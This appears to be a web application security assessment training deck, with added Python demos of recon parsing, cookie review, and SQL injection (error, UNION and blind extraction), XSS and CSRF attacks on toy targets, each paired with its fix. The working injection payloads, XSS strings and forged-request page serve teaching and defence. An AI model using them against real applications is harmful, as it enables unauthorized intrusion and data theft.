ADVISORY SERVICES
Web Application Assessment
March 2009
Agenda
- Definitions
- Landscape of current web applications
- Required skills
- Attack surface
- Scope
- Methodology
- Soft skills
Definitions
- Black box testing (no internal knowledge: the tester sees only what an outside attacker sees)
- White box testing (full knowledge: source code, configuration, architecture)
- Grey box testing (partial knowledge, typically credentials and documentation but no source)
- What about code reviews?
Landscape: Typical Application
- Client: JavaScript, VBScript, ActionScript; AJAX/JSON user experience
- Server: C#, VB.NET, PHP, Java, ColdFusion, Perl, Ruby
- Web services: SOAP, WSDL, UDDI
- Database: Oracle, MySQL, MS SQL, PostgreSQL
- LDAP: AD, Novell, Sun
- Does this list scare you?
All this and more
- RegEx
- URL, hex, Base64, Unicode encoding
- HTML encoding
- SQL syntax
- XML
- LDAP
- All of this in addition to the basics: HTML, CSS, HTTP, HTTPS, IIS/Apache, SSL
RegEx Examples
- ^SELECT (a literal SELECT at the start of the input)
- S%65L%65CT (the same keyword with two letters URL-encoded; ^SELECT never matches it, so decode before you match)
- ^(?!000)([0-6]\d{2}|7([0-6]\d|7[012]))([ -]?)(?!00)\d\d\3(?!0000)\d{4}$ (US Social Security Number; the backreference \3 forces both separators to be the same character)
- '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' (IPv4 dotted quad in grep basic regex syntax; every dot must be escaped, an unescaped dot matches any character)
Encoding Examples
- 'or 1=1-- URL-encoded: %27%6f%72%20%31%3d%31%2d%2d
- password Base64-encoded: cGFzc3dvcmQ=
Attack Surface
- Client: browser, AJAX, Flash, plugins
- Server: web server (Apache, IIS, Sun ONE)
- Web application: forms, cookies, query parameters, file upload/download, "Contact Us" functionality, business logic, concurrency, web services
Start with the Scope
- Take a monumental task and confine it
- URL or IP address?
- Client-side, or just server/application?
- What to test for?
- How to perform those tests?
Methodology (each phase ends by documenting its results)
- Reconnaissance, then document
- Mapping, then document
- Plan, then document
- Test, then document
- Exploit, then document
Reconnaissance
- External (e.g. Google)
- From the site:
  - Platform (e.g. Windows/IIS)
  - Development technology(ies) (e.g. .NET with JavaScript)
  - SSL and weak ciphers
  - robots.txt and crossdomain.xml
- Map the application (spider):
  - Enumerate directories/files
  - Determine functionality
  - Locate entry points
  - Look for comments and hidden fields
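Three of the recon items above (robots.txt, crossdomain.xml, comments and hidden fields) are pure parsing once the responses are in hand. This added example (not part of the deck) runs those checks offline over constructed sample responses: robots.txt Disallow entries become the directory list to enumerate next, crossdomain.xml is checked for wildcard domains and secure="false", and the login page is mined for HTML comments and hidden inputs. The sample texts, the file names and the finding wording are this example's own.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Constructed sample responses; no real site is involved.
ROBOTS_TXT = """\
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /cgi-bin/old/
Allow: /
Sitemap: http://www.example.com/sitemap.xml
"""

CROSSDOMAIN_XML = """\
<cross-domain-policy>
  <allow-access-from domain="*" />
  <allow-access-from domain="*.partner.example" secure="false" />
</cross-domain-policy>
"""

LOGIN_PAGE = """\
<html><body>
<!-- TODO: remove debug=1 bypass before go-live -->
<form action="/login.aspx" method="post">
  <input type="hidden" name="__VIEWSTATE" value="dDwxMjM0" />
  <input type="hidden" name="role" value="user" />
  <input type="text" name="username" />
  <input type="password" name="password" />
</form>
</body></html>
"""


def disallowed_paths(robots):
    """Disallow lines are the owner's list of places not to index, which is
    exactly the list a tester wants to spider and brute-force first."""
    paths = []
    for line in robots.splitlines():
        key, _, value = line.partition(":")
        if key.strip().lower() == "disallow" and value.strip():
            paths.append(value.strip())
    return paths


def crossdomain_findings(policy_xml):
    """Flag Flash cross-domain rules that hand the site's credentials to
    SWFs loaded from other origins."""
    findings = []
    root = ET.fromstring(policy_xml)
    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        secure = rule.get("secure", "true").lower()
        if domain == "*":
            findings.append("wildcard domain: any site can make credentialed requests via Flash")
        elif domain.startswith("*."):
            findings.append("wildcard subdomain %s: every host under it is trusted" % domain)
        if secure == "false":
            findings.append("secure=false on %s: SWFs loaded over plain HTTP may access this HTTPS site" % domain)
    return findings


class HiddenFieldsAndComments(HTMLParser):
    """Collect HTML comments and hidden form inputs from a page."""

    def __init__(self):
        super().__init__()
        self.comments = []
        self.hidden = {}

    def handle_comment(self, data):
        self.comments.append(data.strip())

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden[a.get("name")] = a.get("value")


def page_artifacts(page_html):
    """Return (comments, hidden_fields) for one HTML page."""
    p = HiddenFieldsAndComments()
    p.feed(page_html)
    return p.comments, p.hidden


if __name__ == "__main__":
    print("enumerate next:", disallowed_paths(ROBOTS_TXT))
    print("crossdomain:", crossdomain_findings(CROSSDOMAIN_XML))
    print("page:", page_artifacts(LOGIN_PAGE))
```

A hidden field such as role=user is an entry point in its own right: it goes on the list of parameters to tamper with during the authorization tests later in the methodology.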
Tools Landscape
- Reconnaissance: Gooscan, Fierce, Maltego
- Web scanners: Nikto, Burp, AppScan, Hailstorm
- Focused tools: HTTPrint, Wmap, DirBuster, SSLDigger
- General web assessment tools: Burp Suite, WebScarab
- Firefox add-ons: Firebug and Firecookie, TamperData, JSView
- Live distributions: OWASP LiveCD, Samurai
Post Information Gathering
- Analyze accumulated results from all tools
- Document the application
- Look for areas of vulnerability:
  - Authentication/authorization
  - Cookie attributes: Expires, Path, Domain, and Secure
  - Traversal
  - Injection
  - XSS
  - CSRF
  - Application logic
  - Concurrency and race conditions
Post Information Gathering (2)
- Determine how users are authenticated, and look for user contexts to reverse-engineer the authorization scheme
- Document the important web functions, associated pages, and parameters
- Document the application and logic flow
- Use all of this information to create a plan of exploit, to seek out vulnerabilities
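The cookie-attribute review on the previous slide is mechanical once you have the Set-Cookie headers from the proxy log. This added example (not from the deck) parses three constructed Set-Cookie headers from an imagined HTTPS application and reports the weaknesses a tester would write up: missing Secure, missing HttpOnly, a root Path, a dotted Domain shared with every subdomain, and a long Expires on what should be a session cookie. The headers, the cut-offs and the fixed "now" are this example's own.

```python
from datetime import datetime

# Constructed Set-Cookie headers as they might appear in a proxy log (not real).
SET_COOKIE_HEADERS = [
    "ASP.NET_SessionId=abc123; path=/",
    "auth=tok; Expires=Sun, 01 Jan 2012 00:00:00 GMT; Path=/; Domain=.example.com; Secure",
    "pref=blue; Path=/app; HttpOnly; Secure",
]
# Fixed reference time so the lifetime check is reproducible (assumed).
NOW = datetime(2009, 3, 1)
PERSISTENT_DAYS = 30  # anything living longer than this is flagged (assumed cut-off)


def parse_set_cookie(header):
    """Split one Set-Cookie header into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def cookie_findings(header, now=NOW, over_https=True):
    """Return the weaknesses a tester would note for this cookie."""
    cookie = parse_set_cookie(header)
    a = cookie["attrs"]
    findings = []
    if over_https and "secure" not in a:
        findings.append("missing Secure: also sent over plain HTTP")
    if "httponly" not in a:
        findings.append("missing HttpOnly: readable by script, so XSS can steal it")
    if a.get("path") == "/":
        findings.append("Path=/: sent to every application on the host")
    domain = a.get("domain")
    if domain and domain.startswith("."):
        findings.append("Domain=%s: shared with every subdomain" % domain)
    if "expires" in a:
        expires = datetime.strptime(a["expires"], "%a, %d %b %Y %H:%M:%S %Z")
        days = (expires - now).days
        if days > PERSISTENT_DAYS:
            findings.append("Expires in %d days: persists on disk after the browser closes" % days)
    return findings


if __name__ == "__main__":
    for header in SET_COOKIE_HEADERS:
        print(parse_set_cookie(header)["name"])
        for finding in cookie_findings(header):
            print("  -", finding)
```

Whether Path=/ or a shared Domain is actually a finding depends on what else lives on that host and those subdomains, which is exactly why this sits after the mapping phase rather than in the scanner.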
Finding the Cool Stuff
- Automated vs. manual: let's avoid the flame wars!
- This is where the methodology helps
- Let the automated tools do some of the digging and heavy lifting for you
- That still leaves plenty for you to test manually
What is the cool stuff?
- Injection
- XSS
- CSRF
SQLi
- Assumptions: you know the basics of SQL and the basics of SQLi
- 3 classes:
  - In-band (the data comes back in the same channel as the injection, e.g. in an error message or a UNIONed result)
  - Out-of-band (the data leaves by a different channel, e.g. a DNS or HTTP request made by the database server)
  - Inferential (nothing comes back directly; you infer it from page differences or timing)
- How do you test for it?
- How do you validate?
SQLi Starts at Home
Source: http://xkcd.com/327/ ("Exploits of a Mom", the Little Bobby Tables comic)
SQL Injection Types
- Error: ask the DB a question that will produce an error, and examine the error to glean information
- Union: use the SQL UNION operator to combine two SELECT statements; useful for data extraction
- Blind: ask the DB only true/false questions, and measure the response based on the type of page returned (boolean-based) or the time it took to respond (time-based)
SQLi Tools
- Mieliekoek.pl: uses the output from HTTrack for its target list; looks for ODBC errors in the output; configurable SQLi syntax
- SQLMap: Python command-line tool; blind and UNION SQLi; can use Burp or WebScarab logs for its target list
- Wapiti: set of Python scripts for testing SQLi, CRLF, XSS, and others
- Absinthe: GUI tool that can aid in the download of schema and contents of a database; does not find SQL injection points; uses blind injection techniques, or error-based for SQL Server
- SQL Inject Me: Firefox add-on to test for error-based SQLi
- SQLiX: OWASP Perl command-line tool to test for error-based and blind SQL injection; it can run exploits as well
- SQL Power Injector: .NET-based tool to find and exploit SQLi; focuses on blind injection, but does not try to locate the vulnerability
Mitigating and Preventing SQLi
- Validating input: why a signature for the textbook payload is not enough
  - or 1=1--
  - or 2=2--
  - or 1 in (select @@version)--
- Parameterized queries
- Stored procedures... really? (a stored procedure that builds dynamic SQL from its arguments is just as injectable)
- Web application firewalls... really? (signature filters are bypassed by the encoding and rewriting tricks shown above)
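The SQLi slides above describe error, UNION and blind injection and then argue that blacklisting "1=1" is no defence. This added example (not part of the deck) puts all of that in one runnable script against an in-memory SQLite database: a string-concatenated lookup that is injectable, an error probe, a tautology that a naive "1=1" filter blocks only until it is rewritten as "2=2", a UNION extraction of the users table, a boolean-based blind extraction of a password one character at a time, and the parameterized query that stops all of it. The schema, rows and payload alphabet are constructed for the demo; the database is SQLite rather than the SQL Server of the references, so @@version is not used.

```python
import sqlite3

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"  # assumed charset for blind extraction


def build_db():
    """Constructed sample schema and rows (not from any real application)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users VALUES (1, 'alice', 's3cret', 'admin');
        INSERT INTO users VALUES (2, 'bob', 'hunter2', 'user');
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO products VALUES (1, 'widget');
    """)
    return conn


def product_lookup_vulnerable(conn, name):
    """String concatenation: the classic injectable query."""
    sql = "SELECT name FROM products WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def product_lookup_parameterized(conn, name):
    """Same query with a bound parameter: user data never becomes SQL syntax."""
    rows = conn.execute("SELECT name FROM products WHERE name = ?", (name,))
    return [row[0] for row in rows]


def probe_error(conn, payload):
    """Error-based test: a lone quote breaks the statement and the DB tells you so."""
    try:
        product_lookup_vulnerable(conn, payload)
        return ""
    except sqlite3.Error as exc:
        return str(exc)


def naive_filter(name):
    """The kind of 'input validation' the slide warns about: it blocks the
    textbook payload and nothing else."""
    if "1=1" in name.lower():
        raise ValueError("blocked")
    return name


def blind_extract(conn, inner_select, max_len=20):
    """Inferential (boolean-based blind) extraction: only row/no-row comes back,
    so ask one true/false question per character position."""
    result = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = "widget' AND substr((%s),%d,1)='%s'--" % (inner_select, pos, ch)
            if product_lookup_vulnerable(conn, payload):
                result += ch
                break
        else:
            break  # no character matched: end of string
    return result


if __name__ == "__main__":
    db = build_db()
    print("error probe:", probe_error(db, "'"))
    print("tautology  :", product_lookup_vulnerable(db, "nope' OR 1=1--"))
    print("filter dodg:", product_lookup_vulnerable(db, naive_filter("nope' OR 2=2--")))
    print("union      :", product_lookup_vulnerable(
        db, "' UNION SELECT username || ':' || password FROM users--"))
    print("blind      :", blind_extract(db, "SELECT password FROM users WHERE username='alice'"))
    print("parameter  :", product_lookup_parameterized(db, "nope' OR 1=1--"))
```

Each blind character costs up to 36 requests here; on a real target the same loop is what sqlmap automates, and the time-based variant replaces the row/no-row oracle with a deliberate delay.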
Other Injection Types
- LDAP
- XPath
- OS command
- Tools?
- How do you test for it?
Cross-Site Scripting (XSS)
- Reflected vs. stored: which is more dangerous?
- DOM-based XSS
- How do you test for these?
- Automated tools?
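Testing for reflected XSS comes down to where the echoed input lands in the page, not just whether it is escaped. This added example (not from the deck) renders a constructed search parameter into an HTML body, then into an unquoted and a quoted attribute, and uses a small HTML parser as the oracle for "did active content survive". It shows that html.escape is enough in the body and in a quoted attribute but not in an unquoted one, where a space ends the value and a new event handler attribute walks in. DOM-based XSS is out of scope here because it happens in the client, where server-side escaping never sees the data. Payloads and function names are this example's own.

```python
import html
from html.parser import HTMLParser

# Constructed attacker inputs (example only).
PAYLOAD_BODY = "<script>alert(document.cookie)</script>"
PAYLOAD_ATTR = "x onmouseover=alert(1)"


def search_page_vulnerable(query):
    """Reflected XSS: the query parameter is echoed straight into the page."""
    return "<p>Results for: %s</p>" % query


def search_page_escaped(query):
    """Body context: html.escape neutralises <, >, & and both quote characters."""
    return "<p>Results for: %s</p>" % html.escape(query, quote=True)


def prefill_unquoted_attr(value):
    """Escaping alone is not enough in an unquoted attribute: a space ends the
    value, so the rest of the input becomes a new attribute."""
    return '<input name="q" value=%s>' % html.escape(value, quote=True)


def prefill_quoted_attr(value):
    """Quote the attribute and escape the quotes: the value cannot end early."""
    return '<input name="q" value="%s">' % html.escape(value, quote=True)


class ActiveContentFinder(HTMLParser):
    """Oracle for the demo: records script elements and on* event attributes
    that the browser's parser would actually see."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        for name, _ in attrs:
            if name.lower().startswith("on"):
                self.hits.append(name)


def active_content(rendered):
    finder = ActiveContentFinder()
    finder.feed(rendered)
    return finder.hits


if __name__ == "__main__":
    for label, page in (
        ("body, raw      ", search_page_vulnerable(PAYLOAD_BODY)),
        ("body, escaped  ", search_page_escaped(PAYLOAD_BODY)),
        ("attr, unquoted ", prefill_unquoted_attr(PAYLOAD_ATTR)),
        ("attr, quoted   ", prefill_quoted_attr(PAYLOAD_ATTR)),
    ):
        print(label, active_content(page), page)
```

The same reasoning applies to JavaScript and URL contexts, each of which needs its own encoder; one generic "escape" function per page is the usual root cause of the XSS an automated scanner reports.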
Cross-Site Request Forgery
- How does this differ from XSS?
- Subtle
- Preventable
- How do you test for it?
XSS and CSRF
- Understand the same-origin policy
- Understand Adobe's recent cross-domain policy (crossdomain.xml)
- Understand the nuances of these policies, and how different browsers interpret those nuances
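The CSRF slide calls it subtle and preventable; the same-origin policy slide explains why: the policy stops a hostile page from reading the response, not from sending the request, and the browser attaches the session cookie either way. This added example (not from the deck) simulates a bank-style transfer endpoint with in-memory sessions and a synchronizer token, renders the legitimate form, renders a constructed attacker page that auto-submits a forged transfer, and shows the endpoint accepting the first and rejecting the second (and a token borrowed from another session). The session store, form layout, URLs and response strings are this example's own.

```python
import hmac
import re
import secrets

# In-memory session store: session id -> session data (assumed for the demo).
SESSIONS = {}

# Constructed hostile page: the victim's browser submits this with the victim's
# cookie attached, which is the whole CSRF problem.
ATTACKER_PAGE = """\
<form id="f" action="http://bank.example/transfer" method="post">
  <input type="hidden" name="to" value="mallory">
  <input type="hidden" name="amount" value="1000">
</form>
<script>document.getElementById("f").submit()</script>
"""


def new_session(user):
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = {"user": user, "csrf": secrets.token_urlsafe(32)}
    return sid


def render_transfer_form(sid):
    """The legitimate form carries a per-session secret the attacker cannot
    read from another origin (same-origin policy blocks the read)."""
    token = SESSIONS[sid]["csrf"]
    return ('<form action="/transfer" method="post">'
            '<input type="hidden" name="csrf" value="%s">'
            '<input name="to" value=""><input name="amount" value="">'
            '<input type="submit"></form>' % token)


def form_fields(page_html):
    """Collect name/value pairs from input tags, the way a browser would submit them."""
    return dict(re.findall(r'<input[^>]*name="([^"]+)"[^>]*value="([^"]*)"', page_html))


def handle_transfer(cookies, form):
    """Endpoint under test. Cookies arrive automatically; the token does not."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return "401 not logged in"
    if not hmac.compare_digest(form.get("csrf", ""), session["csrf"]):
        return "403 csrf token missing or wrong"
    return "200 transferred %s to %s" % (form.get("amount"), form.get("to"))


if __name__ == "__main__":
    victim = new_session("alice")
    real = form_fields(render_transfer_form(victim))
    real.update({"to": "bob", "amount": "10"})
    print("legitimate:", handle_transfer({"sid": victim}, real))
    print("forged    :", handle_transfer({"sid": victim}, form_fields(ATTACKER_PAGE)))
```

Testing for CSRF is the mirror image: replay a captured request with the token removed or swapped for one from your own session. If the application still says 200, the check is missing or not bound to the session.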
Soft Skills
- Documentation
- Understand risk, especially business risk
- Communication: scope, testing windows, methodology, etc.
- Expectations
- Time management
References
- Advanced SQL Injection In SQL Server Applications, Chris Anley (NGS Software)
- Advanced SQL Injection, Joe McCray
- Web Application Disassembly with ODBC Error Messages, David Litchfield
- Cross Site Scripting Explained, Amit Klein
- Cross-Site Request Forgeries: Exploitation and Prevention, William Zeller and Edward Felten
- OWASP web site
- OWASP Testing Guide v3